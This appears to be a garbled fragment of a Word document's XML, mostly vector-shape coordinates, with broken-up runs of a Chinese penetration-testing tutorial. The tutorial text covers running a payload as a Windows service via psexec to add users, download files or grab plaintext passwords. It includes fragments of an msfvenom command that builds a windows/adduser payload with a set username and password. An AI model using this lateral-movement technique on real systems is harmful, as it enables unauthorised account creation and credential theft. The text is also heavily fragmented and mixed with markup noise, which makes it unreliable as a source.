      <v:shape style="position:absolute;margin-left:74.400pt;margin-top:695.400pt;width:445.800pt;height:19.800pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" type="#_x0000_t75">
        <v:imagedata r:id="rId14" o:title=""/>
      </v:shape>
    </w:pict>
    <w:pict>
      <v:shape style="position:absolute;margin-left:54.600pt;margin-top:48.600pt;width:467.400pt;height:123.600pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:0" type="#_x0000_t75">
        <v:imagedata r:id="rId15" o:title=""/>
      </v:shape>
    </w:pict>
    <w:pict>
      <v:shape style="position:absolute;margin-left:54.600pt;margin-top:232.800pt;width:405.600pt;height:75.599pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:0" type="#_x0000_t75">
        <v:imagedata r:id="rId16" o:title=""/>
      </v:shape>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:103.500pt;margin-top:593.500pt;width:6.500pt;height:12.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="2070,11870" coordsize="130,250">
        <v:shape style="position:absolute;left:2070;top:11870;width:130;height:250" coordorigin="2070,11870" coordsize="130,250" path="m2095,11880l2095,11880,2095,11880,2095,11880,2095,11880,2095,11880,2095,11880,2095,11880,2095,11880,2095,11880,2095,11880,2095,11880,2095,11880,2095,11880,2095,11880,2095,11880,2095,11880,2095,11880,2095,11880,2095,11880,2096,11880,2096,11880,2096,11880,2096,11880,2096,11880,2096,11880,2096,11880,2096,11880,2096,11880,2097,11880,2097,11880,2097,11880,2097,11880,2097,11880,2098,11880,2098,11880,2098,11880,2098,11880,2099,11880,2099,11880,2099,11880,2100,11880,2100,11880,2100,11880,2101,11880,2101,11880,2102,11880,2102,11880,2102,11880,2103,11880,2103,11880,2104,11880,2105,11880,2105,11880,2106,11880,2106,11880,2107,11880,2108,11880,2108,11880,2109,11880,2110,11880,2110,11880,2111,11880,2112,11880,2113,11880,2114,11880,2115,11880,2116,11880,2116,11880,2117,11880,2118,11880,2119,11880,2121,11880,2122,11880,2123,11880,2124,11880,2125,11880,2126,11880,2128,11880,2129,11880,2130,11880,2132,11880,2133,11880,2134,11880,2136,11880,2137,11880,2139,11880,2140,11880,2142,11880,2144,11880,2145,11880,2147,11880,2149,11880,2151,11880,2152,11880,2154,11880,2156,11880,2158,11880,2160,11880,2162,11880,2164,11880,2166,11880,2168,11880,2171,11880,2173,11880,2175,11880,2178,11880,2180,11880,2182,11880,2185,11880,2187,11880,2190,11880,2192,11880,2195,11880,2198,11880,2201,11880,2203,11880,2206,11880,2209,11880,2212,11880,2215,11880,2215,11880,2215,11880,2215,11880,2215,11880,2215,11880,2215,11880,2215,11880,2215,11880,2215,11880,2215,11880,2215,11880,2215,11880,2215,11880,2215,11880,2215,11880,2215,11880,2215,11881,2215,11881,2215,11881,2215,11881,2215,11881,2215,11881,2215,11882,2215,11882,2215,11882,2215,11882,2215,11883,2215,11883,2215,11883,2215,11884,2215,11884,2215,11884,2215,11885,2215,11885,2215,11886,2215,11886,2215,11887,2215,11888,2215,11888,2215,11889,2215,11890,2215,11890,2215,11891,2215,11892,2215,11893,2215,11894,2215,11895,2215,11896,2215,11897,2215,11898,2215,11899,2215,11900,2215,11901,2215,11903,2215,11904,2215,11905,2215,11907,2215,11908,2215,11910,2215,11911,2215,11913,2215,11914,2215,11916,2215,11918,2215,11920,2215,11922,2215,11924,2215,11926,2215,11928,2215,11930,2215,11932,2215,11934,2215,11936,2215,11939,2215,11941,2215,11944,2215,11946,2215,11949,2215,11952,2215,11955,2215,11958,2215,11960,2215,11963,2215,11967,2215,11970,2215,11973,2215,11976,2215,11980,2215,11983,2215,11987,2215,11990,2215,11994,2215,11998,2215,12002,2215,12006,2215,12010,2215,12014,2215,12018,2215,12022,2215,12027,2215,12031,2215,12036,2215,12041,2215,12045,2215,12050,2215,12055,2215,12060,2215,12065,2215,12071,2215,12076,2215,12081,2215,12087,2215,12093,2215,12098,2215,12104,2215,12110,2215,12116,2215,12122,2215,12129,2215,12135,2215,12135,2215,12135,2215,12135,2215,12135,2215,12135,2215,12135,2215,12135,2215,12135,2215,12135,2215,12135,2215,12135,2215,12135,2215,12135,2215,12135,2215,12135,2215,12135,2215,12135,2215,12135,2215,12135,2215,12135,2215,12135,2214,12135,2214,12135,2214,12135,2214,12135,2214,12135,2214,12135,2214,12135,2214,12135,2213,12135,2213,12135,2213,12135,2213,12135,2213,12135,2212,12135,2212,12135,2212,12135,2212,12135,2211,12135,2211,12135,2211,12135,2210,12135,2210,12135,2209,12135,2209,12135,2209,12135,2208,12135,2208,12135,2207,12135,2207,12135,2206,12135,2206,12135,2205,12135,2205,12135,2204,12135,2203,12135,2203,12135,2202,12135,2201,12135,2200,12135,2200,12135,2199,12135,2198,12135,2197,12135,2196,12135,2196,12135,2195,12135,2194,12135,2193,12135,2192,12135,2191,12135,2190,12135,2189,12135,2187,12135,2186,12135,2185,12135,2184,12135,2183,12135,2181,12135,2180,12135,2179,12135,2177,12135,2176,12135,2174,12135,2173,12135,2171,12135,2170,12135,2168,12135,2167,12135,2165,12135,2163,12135,2161,12135,2160,12135,2158,12135,2156,12135,2154,12135,2152,12135,2150,12135,2148,12135,2146,12135,2144,12135,2142,12135,2140,12135,2137,12135,2135,12135,2133,12135,2130,12135,2128,12135,2125,12135,2123,12135,2120,12135,2118,12135,2115,12135,2112,12135,2110,12135,2107,12135,2104,12135,2101,12135,2098,12135,2095,12135,2095,12135,2095,12135,2095,12135,2095,12135,2095,12135,2095,12135,2095,12135,2095,12135,2095,12135,2095,12135,2095,12135,2095,12135,2095,12135,2095,12135,2095,12135,2095,12135,2095,12134,2095,12134,2095,12134,2095,12134,2095,12134,2095,12134,2095,12134,2095,12133,2095,12133,2095,12133,2095,12132,2095,12132,2095,12132,2095,12131,2095,12131,2095,12131,2095,12130,2095,12130,2095,12129,2095,12129,2095,12128,2095,12127,2095,12127,2095,12126,2095,12125,2095,12125,2095,12124,2095,12123,2095,12122,2095,12121,2095,12120,2095,12119,2095,12118,2095,12117,2095,12116,2095,12115,2095,12114,2095,12113,2095,12111,2095,12110,2095,12109,2095,12107,2095,12106,2095,12104,2095,12102,2095,12101,2095,12099,2095,12097,2095,12095,2095,12094,2095,12092,2095,12090,2095,12088,2095,12085,2095,12083,2095,12081,2095,12079,2095,12076,2095,12074,2095,12071,2095,12069,2095,12066,2095,12063,2095,12060,2095,12058,2095,12055,2095,12052,2095,12049,2095,12045,2095,12042,2095,12039,2095,12035,2095,12032,2095,12028,2095,12025,2095,12021,2095,12017,2095,12013,2095,12009,2095,12005,2095,12001,2095,11997,2095,11993,2095,11988,2095,11984,2095,11979,2095,11974,2095,11970,2095,11965,2095,11960,2095,11955,2095,11950,2095,11944,2095,11939,2095,11934,2095,11928,2095,11922,2095,11917,2095,11911,2095,11905,2095,11899,2095,11893,2095,11886,2095,11880e x" fillcolor="#fefefe" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:103.500pt;margin-top:624.500pt;width:6.500pt;height:13.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="2070,12490" coordsize="130,270">
        <v:shape style="position:absolute;left:2070;top:12490;width:130;height:270" coordorigin="2070,12490" coordsize="130,270" path="m2095,12510l2095,12510,2095,12510,2095,12510,2095,12510,2095,12510,2095,12510,2095,12510,2095,12510,2095,12510,2095,12510,2095,12510,2095,12510,2095,12510,2095,12510,2095,12510,2095,12510,2095,12510,2095,12510,2095,12510,2096,12510,2096,12510,2096,12510,2096,12510,2096,12510,2096,12510,2096,12510,2096,12510,2096,12510,2097,12510,2097,12510,2097,12510,2097,12510,2097,12510,2098,12510,2098,12510,2098,12510,2098,12510,2099,12510,2099,12510,2099,12510,2100,12510,2100,12510,2100,12510,2101,12510,2101,12510,2102,12510,2102,12510,2102,12510,2103,12510,2103,12510,2104,12510,2105,12510,2105,12510,2106,12510,2106,12510,2107,12510,2108,12510,2108,12510,2109,12510,2110,12510,2110,12510,2111,12510,2112,12510,2113,12510,2114,12510,2115,12510,2116,12510,2116,12510,2117,12510,2118,12510,2119,12510,2121,12510,2122,12510,2123,12510,2124,12510,2125,12510,2126,12510,2128,12510,2129,12510,2130,12510,2132,12510,2133,12510,2134,12510,2136,12510,2137,12510,2139,12510,2140,12510,2142,12510,2144,12510,2145,12510,2147,12510,2149,12510,2151,12510,2152,12510,2154,12510,2156,12510,2158,12510,2160,12510,2162,12510,2164,12510,2166,12510,2168,12510,2171,12510,2173,12510,2175,12510,2178,12510,2180,12510,2182,12510,2185,12510,2187,12510,2190,12510,2192,12510,2195,12510,2198,12510,2201,12510,2203,12510,2206,12510,2209,12510,2212,12510,2215,12510,2215,12510,2215,12510,2215,12510,2215,12510,2215,12510,2215,12510,2215,12510,2215,12510,2215,12510,2215,12510,2215,12510,2215,12511,2215,12511,2215,12511,2215,12511,2215,12511,2215,12511,2215,12511,2215,12511,2215,12511,2215,12512,2215,12512,2215,12512,2215,12512,2215,12512,2215,12513,2215,12513,2215,12513,2215,12514,2215,12514,2215,12514,2215,12515,2215,12515,2215,12516,2215,12516,2215,12517,2215,12517,2215,12518,2215,12519,2215,12519,2215,12520,2215,12521,2215,12522,2215,12522,2215,12523,2215,12524,2215,12525,2215,12526,2215,12527,2215,12528,2215,12529,2215,12530,2215,12532,2215,12533,2215,12534,2215,12535,2215,12537,2215,12538,2215,12540,2215,12541,2215,12543,2215,12545,2215,12546,2215,12548,2215,12550,2215,12552,2215,12554,2215,12556,2215,12558,2215,12560,2215,12562,2215,12564,2215,12567,2215,12569,2215,12572,2215,12574,2215,12577,2215,12579,2215,12582,2215,12585,2215,12588,2215,12591,2215,12594,2215,12597,2215,12600,2215,12603,2215,12607,2215,12610,2215,12613,2215,12617,2215,12621,2215,12624,2215,12628,2215,12632,2215,12636,2215,12640,2215,12644,2215,12648,2215,12653,2215,12657,2215,12662,2215,12666,2215,12671,2215,12676,2215,12681,2215,12686,2215,12691,2215,12696,2215,12701,2215,12706,2215,12712,2215,12717,2215,12723,2215,12729,2215,12735,2215,12741,2215,12747,2215,12753,2215,12759,2215,12765,2215,12765,2215,12765,2215,12765,2215,12765,2215,12765,2215,12765,2215,12765,2215,12765,2215,12765,2215,12765,2215,12765,2215,12765,2215,12765,2215,12765,2215,12765,2215,12765,2215,12765,2215,12765,2215,12765,2215,12765,2215,12765,2214,12765,2214,12765,2214,12765,2214,12765,2214,12765,2214,12765,2214,12765,2214,12765,2213,12765,2213,12765,2213,12765,2213,12765,2213,12765,2212,12765,2212,12765,2212,12765,2212,12765,2211,12765,2211,12765,2211,12765,2210,12765,2210,12765,2209,12765,2209,12765,2209,12765,2208,12765,2208,12765,2207,12765,2207,12765,2206,12765,2206,12765,2205,12765,2205,12765,2204,12765,2203,12765,2203,12765,2202,12765,2201,12765,2200,12765,2200,12765,2199,12765,2198,12765,2197,12765,2196,12765,2196,12765,2195,12765,2194,12765,2193,12765,2192,12765,2191,12765,2190,12765,2189,12765,2187,12765,2186,12765,2185,12765,2184,12765,2183,12765,2181,12765,2180,12765,2179,12765,2177,12765,2176,12765,2174,12765,2173,12765,2171,12765,2170,12765,2168,12765,2167,12765,2165,12765,2163,12765,2161,12765,2160,12765,2158,12765,2156,12765,2154,12765,2152,12765,2150,12765,2148,12765,2146,12765,2144,12765,2142,12765,2140,12765,2137,12765,2135,12765,2133,12765,2130,12765,2128,12765,2125,12765,2123,12765,2120,12765,2118,12765,2115,12765,2112,12765,2110,12765,2107,12765,2104,12765,2101,12765,2098,12765,2095,12765,2095,12765,2095,12765,2095,12765,2095,12765,2095,12765,2095,12765,2095,12765,2095,12765,2095,12765,2095,12765,2095,12765,2095,12765,2095,12765,2095,12765,2095,12765,2095,12765,2095,12765,2095,12765,2095,12765,2095,12764,2095,12764,2095,12764,2095,12764,2095,12764,2095,12763,2095,12763,2095,12763,2095,12762,2095,12762,2095,12762,2095,12761,2095,12761,2095,12760,2095,12760,2095,12759,2095,12759,2095,12758,2095,12758,2095,12757,2095,12756,2095,12756,2095,12755,2095,12754,2095,12753,2095,12753,2095,12752,2095,12751,2095,12750,2095,12749,2095,12748,2095,12747,2095,12745,2095,12744,2095,12743,2095,12742,2095,12740,2095,12739,2095,12737,2095,12736,2095,12734,2095,12733,2095,12731,2095,12729,2095,12728,2095,12726,2095,12724,2095,12722,2095,12720,2095,12718,2095,12716,2095,12714,2095,12711,2095,12709,2095,12707,2095,12704,2095,12702,2095,12699,2095,12696,2095,12694,2095,12691,2095,12688,2095,12685,2095,12682,2095,12679,2095,12676,2095,12672,2095,12669,2095,12666,2095,12662,2095,12659,2095,12655,2095,12651,2095,12648,2095,12644,2095,12640,2095,12636,2095,12631,2095,12627,2095,12623,2095,12619,2095,12614,2095,12609,2095,12605,2095,12600,2095,12595,2095,12590,2095,12585,2095,12580,2095,12575,2095,12569,2095,12564,2095,12558,2095,12553,2095,12547,2095,12541,2095,12535,2095,12529,2095,12523,2095,12517,2095,12510e x" fillcolor="#fefefe" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:163.500pt;margin-top:643.500pt;width:12.500pt;height:13.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="3270,12870" coordsize="250,270">
        <v:shape style="position:absolute;left:3270;top:12870;width:250;height:270" coordorigin="3270,12870" coordsize="250,270" path="m3296,12885l3296,12885,3296,12885,3296,12885,3296,12885,3296,12885,3296,12885,3296,12885,3296,12885,3296,12885,3296,12885,3296,12885,3296,12885,3296,12885,3296,12885,3296,12885,3296,12885,3296,12885,3296,12885,3296,12885,3297,12885,3297,12885,3297,12885,3297,12885,3297,12885,3298,12885,3298,12885,3298,12885,3298,12885,3299,12885,3299,12885,3300,12885,3300,12885,3300,12885,3301,12885,3301,12885,3302,12885,3302,12885,3303,12885,3303,12885,3304,12885,3305,12885,3305,12885,3306,12885,3307,12885,3308,12885,3309,12885,3310,12885,3310,12885,3311,12885,3312,12885,3313,12885,3315,12885,3316,12885,3317,12885,3318,12885,3319,12885,3321,12885,3322,12885,3323,12885,3325,12885,3326,12885,3328,12885,3330,12885,3331,12885,3333,12885,3335,12885,3337,12885,3339,12885,3340,12885,3342,12885,3345,12885,3347,12885,3349,12885,3351,12885,3353,12885,3356,12885,3358,12885,3361,12885,3363,12885,3366,12885,3369,12885,3371,12885,3374,12885,3377,12885,3380,12885,3383,12885,3386,12885,3389,12885,3393,12885,3396,12885,3400,12885,3403,12885,3407,12885,3410,12885,3414,12885,3418,12885,3422,12885,3426,12885,3430,12885,3434,12885,3438,12885,3442,12885,3447,12885,3451,12885,3456,12885,3461,12885,3465,12885,3470,12885,3475,12885,3480,12885,3485,12885,3491,12885,3496,12885,3501,12885,3507,12885,3512,12885,3518,12885,3524,12885,3530,12885,3536,12885,3536,12885,3536,12885,3536,12885,3536,12885,3536,12886,3536,12886,3536,12886,3536,12886,3536,12886,3536,12886,3536,12886,3536,12886,3536,12886,3536,12886,3536,12886,3536,12886,3536,12886,3536,12886,3536,12886,3536,12887,3536,12887,3536,12887,3536,12887,3536,12887,3536,12888,3536,12888,3536,12888,3536,12888,3536,12889,3536,12889,3536,12890,3536,12890,3536,12890,3536,12891,3536,12891,3536,12892,3536,12893,3536,12893,3536,12894,3536,12894,3536,12895,3536,12896,3536,12897,3536,12898,3536,12898,3536,12899,3536,12900,3536,12901,3536,12902,3536,12903,3536,12904,3536,12906,3536,12907,3536,12908,3536,12909,3536,12911,3536,12912,3536,12914,3536,12915,3536,12917,3536,12918,3536,12920,3536,12922,3536,12923,3536,12925,3536,12927,3536,12929,3536,12931,3536,12933,3536,12935,3536,12937,3536,12940,3536,12942,3536,12944,3536,12947,3536,12949,3536,12952,3536,12955,3536,12957,3536,12960,3536,12963,3536,12966,3536,12969,3536,12972,3536,12975,3536,12978,3536,12982,3536,12985,3536,12989,3536,12992,3536,12996,3536,13000,3536,13003,3536,13007,3536,13011,3536,13015,3536,13019,3536,13024,3536,13028,3536,13032,3536,13037,3536,13041,3536,13046,3536,13051,3536,13056,3536,13061,3536,13066,3536,13071,3536,13076,3536,13082,3536,13087,3536,13093,3536,13098,3536,13104,3536,13110,3536,13116,3536,13122,3536,13128,3536,13134,3536,13141,3536,13141,3536,13141,3536,13141,3536,13141,3536,13141,3536,13141,3536,13141,3536,13141,3536,13141,3536,13141,3536,13141,3536,13141,3536,13141,3535,13141,3535,13141,3535,13141,3535,13141,3535,13141,3535,13141,3535,13141,3535,13141,3534,13141,3534,13141,3534,13141,3534,13141,3534,13141,3533,13141,3533,13141,3533,13141,3532,13141,3532,13141,3532,13141,3531,13141,3531,13141,3530,13141,3530,13141,3529,13141,3529,13141,3528,13141,3527,13141,3527,13141,3526,13141,3525,13141,3524,13141,3524,13141,3523,13141,3522,13141,3521,13141,3520,13141,3519,13141,3518,13141,3517,13141,3516,13141,3515,13141,3513,13141,3512,13141,3511,13141,3509,13141,3508,13141,3507,13141,3505,13141,3503,13141,3502,13141,3500,13141,3498,13141,3497,13141,3495,13141,3493,13141,3491,13141,3489,13141,3487,13141,3485,13141,3483,13141,3480,13141,3478,13141,3476,13141,3473,13141,3471,13141,3468,13141,3466,13141,3463,13141,3460,13141,3457,13141,3454,13141,3451,13141,3448,13141,3445,13141,3442,13141,3439,13141,3435,13141,3432,13141,3428,13141,3425,13141,3421,13141,3417,13141,3414,13141,3410,13141,3406,13141,3402,13141,3398,13141,3393,13141,3389,13141,3385,13141,3380,13141,3375,13141,3371,13141,3366,13141,3361,13141,3356,13141,3351,13141,3346,13141,3341,13141,3336,13141,3330,13141,3325,13141,3319,13141,3313,13141,3308,13141,3302,13141,3296,13141,3296,13141,3296,13141,3296,13141,3296,13141,3296,13141,3296,13141,3296,13141,3296,13141,3296,13141,3296,13141,3296,13140,3296,13140,3296,13140,3296,13140,3296,13140,3296,13140,3296,13140,3296,13140,3296,13140,3296,13140,3296,13139,3296,13139,3296,13139,3296,13139,3296,13139,3296,13138,3296,13138,3296,13138,3296,13137,3296,13137,3296,13137,3296,13136,3296,13136,3296,13135,3296,13135,3296,13134,3296,13134,3296,13133,3296,13132,3296,13132,3296,13131,3296,13130,3296,13129,3296,13129,3296,13128,3296,13127,3296,13126,3296,13125,3296,13124,3296,13123,3296,13122,3296,13121,3296,13119,3296,13118,3296,13117,3296,13115,3296,13114,3296,13113,3296,13111,3296,13110,3296,13108,3296,13106,3296,13105,3296,13103,3296,13101,3296,13099,3296,13097,3296,13095,3296,13093,3296,13091,3296,13089,3296,13086,3296,13084,3296,13082,3296,13079,3296,13077,3296,13074,3296,13072,3296,13069,3296,13066,3296,13063,3296,13060,3296,13057,3296,13054,3296,13051,3296,13048,3296,13044,3296,13041,3296,13037,3296,13034,3296,13030,3296,13027,3296,13023,3296,13019,3296,13015,3296,13011,3296,13007,3296,13002,3296,12998,3296,12994,3296,12989,3296,12985,3296,12980,3296,12975,3296,12970,3296,12965,3296,12960,3296,12955,3296,12950,3296,12945,3296,12939,3296,12934,3296,12928,3296,12922,3296,12916,3296,12910,3296,12904,3296,12898,3296,12892,3296,1288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机端口变化如下：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虽</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>报错，但并不影响执行。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注意：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75" w:firstLine="483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Psexec创建一个服务后，来运行可执行文件（如Micropoor.exe）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。但是将可执行文件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作为服务，payload必须接受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来自控制管理器的命令，否则将会执行失败。而psexec创建服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务后，将随之停止，该paylo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ad处于挂起模式。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:spacing w:before="0" w:after="0" w:line="323" w:lineRule="auto"/>
        <w:ind w:left="1120" w:right="1358" w:firstLine="483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参考该服务源码：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:color w:val="003783"/>
          <w:spacing w:val="-1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="double" w:color="003783"/>
        </w:rPr>
        <w:t>https://github.com/rapid7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/metasploit-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framework/blob/master/data/templates/src/pe/exe/service/service.c</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:color w:val="383838"/>
          <w:spacing w:val="8"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>，p</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:color w:val="383838"/>
          <w:spacing w:val="7"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>ayload启动</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:color w:val="383838"/>
          <w:spacing w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>后，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:color w:val="383838"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>将会在过一段时间内退出。并强制终止。</w:t>
      </w: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383838"/>
          <w:spacing w:val="5"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>故该参数一般用于</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:color w:val="383838"/>
          <w:spacing w:val="4"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>adduser。配合adduser_payload。或者配合一次性执行完毕非常连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4"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>接的paylo</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:color w:val="383838"/>
          <w:spacing w:val="3"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>ad。如下载。抓明文密码等。不适合需长连接通信的payload。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tmp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windows/adduser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PASS=Micropoor$123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USER=Mi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cropoor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&gt;adduser.exe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platform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was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selected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choosing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Msf::Module::Platform::Windows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from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payload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arch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selected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selecting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arch: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x86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from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encoder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badchars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specified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outputting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raw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size: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279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bytes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563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Final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size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file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73802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219.500pt;width:0.500pt;height:461.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="10390,4390" coordsize="10,9230">
        <v:shape style="position:absolute;left:10390;top:4390;width:10;height:9230" coordorigin="10390,4390" coordsize="10,9230" path="m10402,4406l10402,4406,10402,4406,10402,4406,10402,4406,10402,4407,10402,4407,10402,4407,10402,4408,10402,4409,10402,4410,10402,4412,10402,4413,10402,4416,10402,4418,10402,4421,10402,4425,10402,4429,10402,4433,10402,4438,10402,4444,10402,4450,10402,4457,10402,4464,10402,4473,10402,4482,10402,4492,10402,4502,10402,4514,10402,4526,10402,4540,10402,4554,10402,4569,10402,4585,10402,4603,10402,4621,10402,4641,10402,4661,10402,4683,10402,4706,10402,4731,10402,4756,10402,4783,10402,4811,10402,4841,10402,4872,10402,4905,10402,4938,10402,4974,10402,5011,10402,5050,10402,5090,10402,5132,10402,5175,10402,5220,10402,5267,10402,5316,10402,5367,10402,5419,10402,5473,10402,5529,10402,5587,10402,5647,10402,5709,10402,5774,10402,5840,10402,5908,10402,5978,10402,6051,10402,6126,10402,6203,10402,6282,10402,6363,10402,6447,10402,6533,10402,6622,10402,6713,10402,6807,10402,6903,10402,7001,10402,7102,10402,7206,10402,7312,10402,7421,10402,7533,10402,7647,10402,7764,10402,7884,10402,8007,10402,8133,10402,8261,10402,8392,10402,8527,10402,8664,10402,8805,10402,8948,10402,9094,10402,9244,10402,9397,10402,9553,10402,9712,10402,9874,10402,10040,10402,10209,10402,10381,10402,10557,10402,10736,10402,10919,10402,11105,10402,11294,10402,11488,10402,11684,10402,11885,10402,12089,10402,12296,10402,12507,10402,12723,10402,12941,10402,13164,10402,13391,10402,13621e" filled="f" stroked="t" strokeweight="0.750pt" strokecolor="#e6e8eb">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:74.500pt;margin-top:219.500pt;width:449.500pt;height:19.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="1490,4390" coordsize="8990,390">
        <v:shape style="position:absolute;left:1490;top:4390;width:8990;height:390" coordorigin="1490,4390" coordsize="8990,390" path="m1510,4406l1510,4406,1510,4406,1510,4406,1510,4406,1510,4406,1510,4406,1511,4406,1512,4406,1512,4406,1514,4406,1515,4406,1517,4406,1519,4406,1521,4406,1524,4406,1528,4406,1532,4406,1536,4406,1541,4406,1546,4406,1552,4406,1559,4406,1566,4406,1575,4406,1583,4406,1593,4406,1603,4406,1615,4406,1627,4406,1640,4406,1654,4406,1668,4406,1684,4406,1701,4406,1719,4406,1738,4406,1758,4406,1780,4406,1802,4406,1826,4406,1851,4406,1877,4406,1904,4406,1933,4406,1963,4406,1995,4406,2028,4406,2063,4406,2099,4406,2136,4406,2175,4406,2216,4406,2259,4406,2303,4406,2348,4406,2396,4406,2445,4406,2496,4406,2549,4406,2604,4406,2660,4406,2719,4406,2779,4406,2841,4406,2906,4406,2972,4406,3041,4406,3112,4406,3184,4406,3259,4406,3336,4406,3416,4406,3498,4406,3582,4406,3668,4406,3757,4406,3848,4406,3941,4406,4037,4406,4136,4406,4236,4406,4340,4406,4446,4406,4555,4406,4666,4406,4780,4406,4897,4406,5017,4406,5139,4406,5264,4406,5392,4406,5523,4406,5657,4406,5793,4406,5933,4406,6076,4406,6222,4406,6370,4406,6522,4406,6677,4406,6835,4406,6997,4406,7161,4406,7329,4406,7500,4406,7675,4406,7853,4406,8034,4406,8219,4406,8407,4406,8598,4406,8793,4406,8992,4406,9194,4406,9400,4406,9609,4406,9823,4406,10039,4406,10260,4406,10484,4406,10484,4406,10484,4406,10484,4406,10484,4406,10484,4406,10484,4406,10484,4406,10484,4406,10484,4406,10484,4406,10484,4406,10484,4407,10484,4407,10484,4407,10484,4407,10484,4407,10484,4407,10484,4407,10484,4408,10484,4408,10484,4408,10484,4408,10484,4409,10484,4409,10484,4409,10484,4410,10484,4410,10484,4411,10484,4411,10484,4412,10484,4412,10484,4413,10484,4414,10484,4415,10484,4415,10484,4416,10484,4417,10484,4418,10484,4419,10484,4420,10484,4421,10484,4422,10484,4423,10484,4425,10484,4426,10484,4427,10484,4429,10484,4430,10484,4432,10484,4433,10484,4435,10484,4437,10484,4439,10484,4441,10484,4443,10484,4445,10484,4447,10484,4449,10484,4451,10484,4454,10484,4456,10484,4459,10484,4461,10484,4464,10484,4467,10484,4470,10484,4473,10484,4476,10484,4479,10484,4482,10484,4486,10484,4489,10484,4493,10484,4496,10484,4500,10484,4504,10484,4508,10484,4512,10484,4516,10484,4520,10484,4525,10484,4529,10484,4534,10484,4539,10484,4543,10484,4548,10484,4553,10484,4559,10484,4564,10484,4569,10484,4575,10484,4581,10484,4587,10484,4592,10484,4599,10484,4605,10484,4611,10484,4618,10484,4624,10484,4631,10484,4638,10484,4645,10484,4652,10484,4659,10484,4667,10484,4674,10484,4682,10484,4690,10484,4698,10484,4706,10484,4714,10484,4723,10484,4732,10484,4740,10484,4749,10484,4758,10484,4768,10484,4777,10484,4787,10484,4796,10484,4796,10484,4796,10484,4796,10484,4796,10484,4796,10484,4796,10483,4796,10482,4796,10482,4796,10480,4796,10479,4796,10477,4796,10475,4796,10473,4796,10470,4796,10466,4796,10462,4796,10458,4796,10453,4796,10448,4796,10442,4796,10435,4796,10428,4796,10419,4796,10411,4796,10401,4796,10391,4796,10379,4796,10367,4796,10354,4796,10340,4796,10326,4796,10310,4796,10293,4796,10275,4796,10256,4796,10236,4796,10215,4796,10192,4796,10168,4796,10143,4796,10117,4796,10090,4796,10061,4796,10031,4796,9999,4796,9966,4796,9931,4796,9895,4796,9858,4796,9819,4796,9778,4796,9735,4796,9691,4796,9646,4796,9598,4796,9549,4796,9498,4796,9445,4796,9391,4796,9334,4796,9275,4796,9215,4796,9153,4796,9088,4796,9022,4796,8953,4796,8883,4796,8810,4796,8735,4796,8658,4796,8578,4796,8497,4796,8413,4796,8326,4796,8238,4796,8146,4796,8053,4796,7957,4796,7859,4796,7758,4796,7654,4796,7548,4796,7439,4796,7328,4796,7214,4796,7097,4796,6977,4796,6855,4796,6730,4796,6602,4796,6471,4796,6337,4796,6201,4796,6061,4796,5918,4796,5773,4796,5624,4796,5472,4796,5317,4796,5159,4796,4997,4796,4833,4796,4665,4796,4494,4796,4319,4796,4141,4796,3960,4796,3776,4796,3587,4796,3396,4796,3201,4796,3002,4796,2800,4796,2594,4796,2385,4796,2172,4796,1955,4796,1734,4796,1510,4796,1510,4796,1510,4796,